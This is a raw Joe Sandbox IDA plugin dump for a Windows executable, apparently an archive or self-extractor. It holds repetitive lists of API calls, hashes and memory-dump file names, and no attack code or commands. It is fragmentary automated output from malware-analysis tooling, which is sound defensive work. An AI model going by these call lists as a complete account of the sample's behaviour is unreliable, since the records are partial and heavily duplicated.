                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                • String ID:
                                                • API String ID: 1269201914-0
                                                • Opcode ID: 0ca0f44aec01865c184c3bfb6abbf3ea9603d83523e9ecf98d5c21a17c0dd738
                                                • Instruction ID: df3949cd46b5ad5c13a3852dadda2fa9f0f75fd3dcd2834eee0105791ef896c7
                                                • Opcode Fuzzy Hash: 0ca0f44aec01865c184c3bfb6abbf3ea9603d83523e9ecf98d5c21a17c0dd738
                                                • Instruction Fuzzy Hash: D1B0128A3DC1206C3204D1147E42D3701CCC0C3B1133086DAF80CD1D41EE805D891032
                                                APIs
                                                • ___delayLoadHelper2@8.DELAYIMP ref: 00B24918
                                                  • Part of subcall function 00B24FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B25041
                                                  • Part of subcall function 00B24FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?,?,00000000,?), ref: 00B25052
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                • String ID:
                                                • API String ID: 1269201914-0
                                                • Opcode ID: e9343b75bda3976a521ed54ed988731184894b628f24b7e14c842e7a26bd083f
                                                • Instruction ID: 5e2a9876c9071644723e5e349048deec02fb4bfc903bf883c4d2a81da61048ea
                                                • Opcode Fuzzy Hash: e9343b75bda3976a521ed54ed988731184894b628f24b7e14c842e7a26bd083f
                                                • Instruction Fuzzy Hash: 29B012863DC1206C33449114BE02D3701DCC0C2B1133047DAF40CD1841EEC05DC81032
                                                APIs
                                                • ___delayLoadHelper2@8.DELAYIMP ref: 00B24918
                                                  • Part of subcall function 00B24FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B25041
                                                  • Part of subcall function 00B24FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?,?,00000000,?), ref: 00B25052
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                • String ID:
                                                • API String ID: 1269201914-0
                                                • Opcode ID: 60f8ebaeb0dc39f555f291c23442aa1cc090174e07e121a76fd060d5b234161b
                                                • Instruction ID: aa189cf9db9640a6a7829fffd69da059f9d50f1974bf6300e46fa0b610715e02
                                                • Opcode Fuzzy Hash: 60f8ebaeb0dc39f555f291c23442aa1cc090174e07e121a76fd060d5b234161b
                                                • Instruction Fuzzy Hash: AFB012863DC0206C32049114BF02D3701DCC0C2B1133047DAF80CD1841EEC14E891032
                                                APIs
                                                • ___delayLoadHelper2@8.DELAYIMP ref: 00B24918
                                                  • Part of subcall function 00B24FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B25041
                                                  • Part of subcall function 00B24FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?,?,00000000,?), ref: 00B25052
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                • String ID:
                                                • API String ID: 1269201914-0
                                                • Opcode ID: abfafced814c18b1c7d28f63e0f0bf9de1fd766caeb10d93bc509ee1e96a175e
                                                • Instruction ID: bc3adf317a97ee51fd63662de38d739b701257eb1bbcac6d6e51cd590263f222
                                                • Opcode Fuzzy Hash: abfafced814c18b1c7d28f63e0f0bf9de1fd766caeb10d93bc509ee1e96a175e
                                                • Instruction Fuzzy Hash: 97B012963DC0207C320451107F02D3701CCC0C2B1133046DAF80CE0852AE825E891032
                                                APIs
                                                • ___delayLoadHelper2@8.DELAYIMP ref: 00B24918
                                                  • Part of subcall function 00B24FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B25041
                                                  • Part of subcall function 00B24FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?,?,00000000,?), ref: 00B25052
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                • String ID:
                                                • API String ID: 1269201914-0
                                                APIs
                                                • ___delayLoadHelper2@8.DELAYIMP ref: 00B24B3B
                                                  • Part of subcall function 00B24FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B25041
                                                  • Part of subcall function 00B24FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?,?,00000000,?), ref: 00B25052
                                                APIs
                                                • ___delayLoadHelper2@8.DELAYIMP ref: 00B24C90
                                                  • Part of subcall function 00B24FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B25041
                                                  • Part of subcall function 00B24FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?,?,00000000,?), ref: 00B25052
                                                APIs
                                                • ___delayLoadHelper2@8.DELAYIMP ref: 00B24CF1
                                                  • Part of subcall function 00B24FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B25041
                                                  • Part of subcall function 00B24FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?,?,00000000,?), ref: 00B25052
                                                APIs
                                                • SetCurrentDirectoryW.KERNELBASE(?), ref: 00B12233
                                                APIs
                                                • ___delayLoadHelper2@8.DELAYIMP ref: 00B24918
                                                  • Part of subcall function 00B24FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B25041
                                                  • Part of subcall function 00B24FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?,?,00000000,?), ref: 00B25052
                                                APIs
                                                • ___delayLoadHelper2@8.DELAYIMP ref: 00B24B3B
                                                  • Part of subcall function 00B24FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B25041
                                                  • Part of subcall function 00B24FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?,?,00000000,?), ref: 00B25052
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                • String ID:
                                                • API String ID: 1269201914-0
                                                • Opcode ID: 613fbfb07e5091a673c20f8fd2272d38f5d535f2535e185ea58717193d5f8168
                                                • Instruction ID: eb4b9117c2bea9ecc0597019bea3fdecfe6fc29a0b9313dd999b84ad66abe7ec
                                                • Opcode Fuzzy Hash: 613fbfb07e5091a673c20f8fd2272d38f5d535f2535e185ea58717193d5f8168
                                                • Instruction Fuzzy Hash: 1BA0029519D1317C310451557E47D37159DC4C5B517315799F409C54556AC059455031
                                                APIs
                                                • ___delayLoadHelper2@8.DELAYIMP ref: 00B24B3B
                                                  • Part of subcall function 00B24FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B25041
                                                  • Part of subcall function 00B24FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?,?,00000000,?), ref: 00B25052
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                • String ID:
                                                • API String ID: 1269201914-0
                                                • Opcode ID: c4609f3c23b66181d328d9821cada5a87cf998d306d642f5614dff28d2ee4bdf
                                                • Instruction ID: 75d5143cb32a96e54f3e232a2f8d6acb8dda3cd34bd5f0152ae84c8b18088329
                                                • Opcode Fuzzy Hash: c4609f3c23b66181d328d9821cada5a87cf998d306d642f5614dff28d2ee4bdf
                                                • Instruction Fuzzy Hash: 10A001962AD1317C3108A256BE4BD3B269DC8D2B21731A79AF409D5896AAD05A896032
                                                APIs
                                                • ___delayLoadHelper2@8.DELAYIMP ref: 00B24B3B
                                                  • Part of subcall function 00B24FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B25041
                                                  • Part of subcall function 00B24FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?,?,00000000,?), ref: 00B25052
                                                Similarity
                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                • String ID:
                                                • API String ID: 1269201914-0
                                                • Opcode ID: ecfb3dad201b2fee29569f7b7aa3b0e07b7b2ba33ae8026ae9dbc78305420642
                                                • Instruction ID: eb4b9117c2bea9ecc0597019bea3fdecfe6fc29a0b9313dd999b84ad66abe7ec
                                                • Opcode Fuzzy Hash: ecfb3dad201b2fee29569f7b7aa3b0e07b7b2ba33ae8026ae9dbc78305420642
                                                • Instruction Fuzzy Hash: 1BA0029519D1317C310451557E47D37159DC4C5B517315799F409C54556AC059455031
                                                APIs
                                                • ___delayLoadHelper2@8.DELAYIMP ref: 00B24B3B
                                                  • Part of subcall function 00B24FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B25041
                                                  • Part of subcall function 00B24FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?,?,00000000,?), ref: 00B25052
                                                Similarity
                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                • String ID:
                                                • API String ID: 1269201914-0
                                                • Opcode ID: 54835d13ad05f7c981d9d830c35dfa9d016524d8c698c5dfc5116d988df84d10
                                                • Instruction ID: eb4b9117c2bea9ecc0597019bea3fdecfe6fc29a0b9313dd999b84ad66abe7ec
                                                • Opcode Fuzzy Hash: 54835d13ad05f7c981d9d830c35dfa9d016524d8c698c5dfc5116d988df84d10
                                                • Instruction Fuzzy Hash: 1BA0029519D1317C310451557E47D37159DC4C5B517315799F409C54556AC059455031
                                                APIs
                                                • ___delayLoadHelper2@8.DELAYIMP ref: 00B24B3B
                                                  • Part of subcall function 00B24FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B25041
                                                  • Part of subcall function 00B24FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?,?,00000000,?), ref: 00B25052
                                                Similarity
                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                • String ID:
                                                • API String ID: 1269201914-0
                                                • Opcode ID: f88e4f78664b6325b72ab4705c7cd172a62988822fdbd6a7d99f2fe18496be97
                                                • Instruction ID: eb4b9117c2bea9ecc0597019bea3fdecfe6fc29a0b9313dd999b84ad66abe7ec
                                                • Opcode Fuzzy Hash: f88e4f78664b6325b72ab4705c7cd172a62988822fdbd6a7d99f2fe18496be97
                                                • Instruction Fuzzy Hash: 1BA0029519D1317C310451557E47D37159DC4C5B517315799F409C54556AC059455031
                                                APIs
                                                • ___delayLoadHelper2@8.DELAYIMP ref: 00B24B3B
                                                  • Part of subcall function 00B24FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B25041
                                                  • Part of subcall function 00B24FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?,?,00000000,?), ref: 00B25052
                                                Similarity
                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                • String ID:
                                                • API String ID: 1269201914-0
                                                • Opcode ID: 319ec59ad1ffa824b830a25b8cd59a5358e88c7acd3e75ab2e45d977ff223255
                                                • Instruction ID: eb4b9117c2bea9ecc0597019bea3fdecfe6fc29a0b9313dd999b84ad66abe7ec
                                                • Opcode Fuzzy Hash: 319ec59ad1ffa824b830a25b8cd59a5358e88c7acd3e75ab2e45d977ff223255
                                                • Instruction Fuzzy Hash: 1BA0029519D1317C310451557E47D37159DC4C5B517315799F409C54556AC059455031
                                                APIs
                                                • ___delayLoadHelper2@8.DELAYIMP ref: 00B24C90
                                                  • Part of subcall function 00B24FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B25041
                                                  • Part of subcall function 00B24FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?,?,00000000,?), ref: 00B25052
                                                Similarity
                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                • String ID:
                                                • API String ID: 1269201914-0
                                                • Opcode ID: ebdd085c650bb2f7fe8a7f9eb5be111b6dbf7754b59d1692e82e1c2aede5edc4
                                                • Instruction ID: a8e2f81b5ee11c25e38b2d2abdc0c763c4eb3fa0da79d1e4f056b8542d922e20
                                                • Opcode Fuzzy Hash: ebdd085c650bb2f7fe8a7f9eb5be111b6dbf7754b59d1692e82e1c2aede5edc4
                                                • Instruction Fuzzy Hash: EBA001962AE126BC3109A255BE46C3B029DC4C6B617328A9AF40AC5892AA8019896031
                                                APIs
                                                • ___delayLoadHelper2@8.DELAYIMP ref: 00B24CF1
                                                  • Part of subcall function 00B24FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B25041
                                                  • Part of subcall function 00B24FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?,?,00000000,?), ref: 00B25052
                                                Similarity
                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                • String ID:
                                                • API String ID: 1269201914-0
                                                • Opcode ID: 77ab612ee225df55d17424f824850ade9a255c2a226901f95eed2553aba11274
                                                • Instruction ID: b7cd2c1549d9854d69cd8d73b8333d94282419f835f42255d36dd836dd1ec64e
                                                • Opcode Fuzzy Hash: 77ab612ee225df55d17424f824850ade9a255c2a226901f95eed2553aba11274
                                                • Instruction Fuzzy Hash: C4A0029569D5227C310861557F46C37019DD4D5B517314699F409C54516B8119595031
                                                APIs
                                                • ___delayLoadHelper2@8.DELAYIMP ref: 00B24CF1
                                                  • Part of subcall function 00B24FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B25041
                                                  • Part of subcall function 00B24FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?,?,00000000,?), ref: 00B25052
                                                Similarity
                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                • String ID:
                                                • API String ID: 1269201914-0
                                                • Opcode ID: 2b6f303f5aa0b8f8d92d840775c0abe40235316bd26bc8ec1f65ab9e0092af58
                                                • Instruction ID: 6bbb0ef0d7318fd1d5dbd8c32ad44e84a9b4053584bae0c9be24a507ae238437
                                                • Opcode Fuzzy Hash: 2b6f303f5aa0b8f8d92d840775c0abe40235316bd26bc8ec1f65ab9e0092af58
                                                • Instruction Fuzzy Hash: 8BA0019A6AE522BD3108A255BF4AC3B029DD4D2B21731869AF409D6892AB81199A6071
                                                APIs
                                                • ___delayLoadHelper2@8.DELAYIMP ref: 00B24C90
                                                  • Part of subcall function 00B24FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B25041
                                                  • Part of subcall function 00B24FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?,?,00000000,?), ref: 00B25052
                                                Similarity
                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                • String ID:
                                                • API String ID: 1269201914-0
                                                • Opcode ID: a5441720db0c5922d565c0df9c47ea4951598cc66a55ce6090876e74a0538782
                                                • Instruction ID: a8e2f81b5ee11c25e38b2d2abdc0c763c4eb3fa0da79d1e4f056b8542d922e20
                                                • Opcode Fuzzy Hash: a5441720db0c5922d565c0df9c47ea4951598cc66a55ce6090876e74a0538782
                                                • Instruction Fuzzy Hash: EBA001962AE126BC3109A255BE46C3B029DC4C6B617328A9AF40AC5892AA8019896031
                                                APIs
                                                • ___delayLoadHelper2@8.DELAYIMP ref: 00B24C90
                                                  • Part of subcall function 00B24FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B25041
                                                  • Part of subcall function 00B24FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?,?,00000000,?), ref: 00B25052
                                                Similarity
                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                • String ID:
                                                • API String ID: 1269201914-0
                                                • Opcode ID: 3782e1fc10d151cf159a0e5de576972e9a2682b70f5168d92cc604b633c1b879
                                                • Instruction ID: a8e2f81b5ee11c25e38b2d2abdc0c763c4eb3fa0da79d1e4f056b8542d922e20
                                                • Opcode Fuzzy Hash: 3782e1fc10d151cf159a0e5de576972e9a2682b70f5168d92cc604b633c1b879
                                                • Instruction Fuzzy Hash: EBA001962AE126BC3109A255BE46C3B029DC4C6B617328A9AF40AC5892AA8019896031
                                                APIs
                                                • ___delayLoadHelper2@8.DELAYIMP ref: 00B24C90
                                                  • Part of subcall function 00B24FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B25041
                                                  • Part of subcall function 00B24FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?,?,00000000,?), ref: 00B25052
                                                Similarity
                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                • String ID:
                                                • API String ID: 1269201914-0
                                                • Opcode ID: 659697d54784a94339797f40a4f2d2c26e3977ea83f8b8d3ce0d874ecccb3825
                                                • Instruction ID: a8e2f81b5ee11c25e38b2d2abdc0c763c4eb3fa0da79d1e4f056b8542d922e20
                                                • Opcode Fuzzy Hash: 659697d54784a94339797f40a4f2d2c26e3977ea83f8b8d3ce0d874ecccb3825
                                                • Instruction Fuzzy Hash: EBA001962AE126BC3109A255BE46C3B029DC4C6B617328A9AF40AC5892AA8019896031
                                                APIs
                                                • SetDlgItemTextW.USER32(?,?,?), ref: 00B01DFC
                                                Similarity
                                                • API ID: ItemText
                                                • String ID:
                                                • API String ID: 3367045223-0
                                                • Opcode ID: 2f8107bac597b860054f43cb7408ae406f7ff1fc420c282af27345f519dc330b
                                                • Instruction ID: 8557a9a61b8acd134cf1c772f0d7636b35dc1fd2a0bcaf5d8ee32285dcb8ef9c
                                                • Opcode Fuzzy Hash: 2f8107bac597b860054f43cb7408ae406f7ff1fc420c282af27345f519dc330b
                                                • Instruction Fuzzy Hash: 0FC0EA31508200EFCB058B68E948E1ABBA6BB95312B5189A8F15486020C771D920DB62
                                                APIs
                                                • ___delayLoadHelper2@8.DELAYIMP ref: 00B24CF1
                                                  • Part of subcall function 00B24FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B25041
                                                  • Part of subcall function 00B24FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?,?,00000000,?), ref: 00B25052
                                                Similarity
                                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                • String ID:
                                                • API String ID: 1269201914-0
                                                • Opcode ID: ace680e3ddc143e6a0d1afc3e9ec931e8bb518afc6fcd722c834a33159e32d89
                                                • Instruction ID: b7cd2c1549d9854d69cd8d73b8333d94282419f835f42255d36dd836dd1ec64e
                                                • Opcode Fuzzy Hash: ace680e3ddc143e6a0d1afc3e9ec931e8bb518afc6fcd722c834a33159e32d89
                                                • Instruction Fuzzy Hash: C4A0029569D5227C310861557F46C37019DD4D5B517314699F409C54516B8119595031
                                                APIs
                                                • SetEndOfFile.KERNELBASE(?,00B0D115,?,?,?,?,?,?,?), ref: 00B0E8DC
                                                Similarity
                                                • API ID: File
                                                • String ID:
                                                • API String ID: 749574446-0
                                                • Opcode ID: de1a95f08c06e31d6db2acf19d382f3a9b2a34748c12ee89c2fa2cc9ba9495f7
                                                • Instruction ID: f10931b2f58818aa1ec80118a29789b538f41d62e5b633ad20cd239700c4c46f
                                                • Opcode Fuzzy Hash: de1a95f08c06e31d6db2acf19d382f3a9b2a34748c12ee89c2fa2cc9ba9495f7
                                                • Instruction Fuzzy Hash: E8A00130205145CB9A451B61DE0960E7A6AAE41699B2980A8A4099A071DB268CA2AA41
                                                APIs
                                                • CloseHandle.KERNELBASE(?,?,00000001,00B0DE10,5EA84158,?,00000000,00B393B1,000000FF,?,00B0BEA6,?), ref: 00B0DE6B
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: CloseHandle
                                                • String ID:
                                                • API String ID: 2962429428-0
                                                • Opcode ID: a148cff6fc183e2002b87489dd0fa5f246c4d79ac350510e39ea8898e91dd9c2
                                                • Instruction ID: 7425445c770a7f64da60c9033f14621ac80ba57bb0484863173aed90f820a43e
                                                • Opcode Fuzzy Hash: a148cff6fc183e2002b87489dd0fa5f246c4d79ac350510e39ea8898e91dd9c2
                                                • Instruction Fuzzy Hash: 0AF0A071442B41DBEB349B74C804392BBE4AB21324F048B9ED0F64A5E4C7B0A9899B50
                                                APIs
                                                • _wcslen.LIBCMT ref: 00B09CB1
                                                  • Part of subcall function 00B0AC11: GetCurrentProcess.KERNEL32(00000020,?), ref: 00B0AC2E
                                                  • Part of subcall function 00B0AC11: GetLastError.KERNEL32 ref: 00B0AC72
                                                  • Part of subcall function 00B0AC11: CloseHandle.KERNEL32(?), ref: 00B0AC81
                                                  • Part of subcall function 00B02F45: _wcslen.LIBCMT ref: 00B02F50
                                                • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000001,00000080,00000000,?,00000000,?,00000001,?,00000000,00000000,?,\??\), ref: 00B09EE1
                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,5EA84CA0,00B39937,000000FF), ref: 00B09F1E
                                                • CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,00000003,02200000,00000000,?,00000000,?,00000000,?,00000001,?,00000000,00000000), ref: 00B0A0BF
                                                  • Part of subcall function 00B014A7: _wcslen.LIBCMT ref: 00B014B8
                                                • DeviceIoControl.KERNEL32(00000000,000900A4,?,-00000008,00000000,00000000,?,00000000), ref: 00B0A127
                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,5EA84CA0,00B39937,000000FF), ref: 00B0A134
                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,5EA84CA0,00B39937,000000FF), ref: 00B0A14A
                                                • RemoveDirectoryW.KERNEL32(00000000,00000009,?,?,?,?,?,?,?,?,?,5EA84CA0,00B39937,000000FF), ref: 00B0A18E
                                                • DeleteFileW.KERNEL32(00000000,00000009,?,?,?,?,?,?,?,?,?,5EA84CA0,00B39937,000000FF), ref: 00B0A196
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1862034776.0000000000B01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                • Associated: 00000000.00000002.1862005735.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862075183.0000000000B3C000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B49000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862095093.0000000000B52000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1862155633.0000000000B57000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_b00000_ngPebbPhbp.jbxd
                                                Similarity
                                                • API ID: CloseFileHandle_wcslen$CreateErrorLast$ControlCurrentDeleteDeviceDirectoryProcessRemove
                                                • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                • API String ID: 3517300771-3508440684
                                                • Opcode ID: 65f1368c5b425d68db38f779faa1062ced6ee78135364d4afdec11b43aa93da2
                                                • Instruction ID: affbd9f220ee99d00532cf2bcaf382a29a65c9c042fcd898a393bfc1dbe9000a
                                                • Opcode Fuzzy Hash: 65f1368c5b425d68db38f779faa1062ced6ee78135364d4afdec11b43aa93da2
                                                • Instruction Fuzzy Hash: 883264719002889FDB24DFA4CC85BEE7BF9EF15310F1045A9E859E72D2DB349A48CB61
                                                APIs
                                                • __EH_prolog3_GS.LIBCMT ref: 00B2163A
                                                  • Part of subcall function 00B01E44: GetDlgItem.USER32(00000000,00003021), ref: 00B01E88
                                                  • Part of subcall function 00B01E44: SetWindowTextW.USER32(00000000,00B3C6C8), ref: 00B01E9E
                                                • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 00B216BB
                                                • EndDialog.USER32(?,00000006), ref: 00B216CE
                                                • GetDlgItem.USER32(?,0000006C), ref: 00B216EA
                                                • SetFocus.USER32(00000000), ref: 00B216F1
                                                  • Part of subcall function 00B014A7: _wcslen.LIBCMT ref: 00B014B8
                                                  • Part of subcall function 00B01DE7: SetDlgItemTextW.USER32(?,?,?), ref: 00B01DFC
                                                • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 00B21763
                                                • FindFirstFileW.KERNEL32(?,?), ref: 00B21783
                                                • FindClose.KERNEL32(00000000,?,00000000,00000000,00000000,00000099,?,?,00000000), ref: 00B21826
                                                • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 00B218AD
                                                  • Part of subcall function 00B01150: _wcslen.LIBCMT ref: 00B0115B
                                                Strings
                                                Memory Dump Source
